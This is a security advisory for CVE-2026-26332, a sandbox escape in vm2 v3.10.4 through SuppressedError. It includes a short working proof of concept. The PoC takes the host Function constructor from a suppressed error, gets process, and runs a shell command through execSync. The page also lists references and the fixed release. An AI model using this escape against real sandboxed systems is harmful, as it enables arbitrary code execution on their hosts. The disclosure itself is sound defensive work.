VM2 Has a Sandbox Escape Issue via SuppressedError

GHSA-55hx-c926-fr95 · CVE-2026-26332

Published May 5, 2026 · Modified May 5, 2026

Description

In vm2 v3.10.4 on Node.js v24.13.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code.

PoC

const { VM } = require("vm2");

const vm = new VM();

vm.run(`
const ds = new DisposableStack();
ds.defer(() => { throw null; });
ds.defer(() => {
  const e = Error();
  e.name = Symbol();
  e.stack;
});
try {
  ds.dispose();
} catch(e) {
  const Function = e.suppressed.constructor.constructor;
  const process = new Function("return process;")();
  const { execSync } = process.mainModule.require("node:child_process");
  execSync("echo pwned", { stdio: "inherit" });
}
`);

References

WEB https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95
ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-26332
WEB https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0
WEB https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f
WEB https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca
WEB https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d
WEB https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338
PACKAGE https://github.com/patriksimek/vm2
WEB https://github.com/patriksimek/vm2/releases/tag/v3.11.0

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes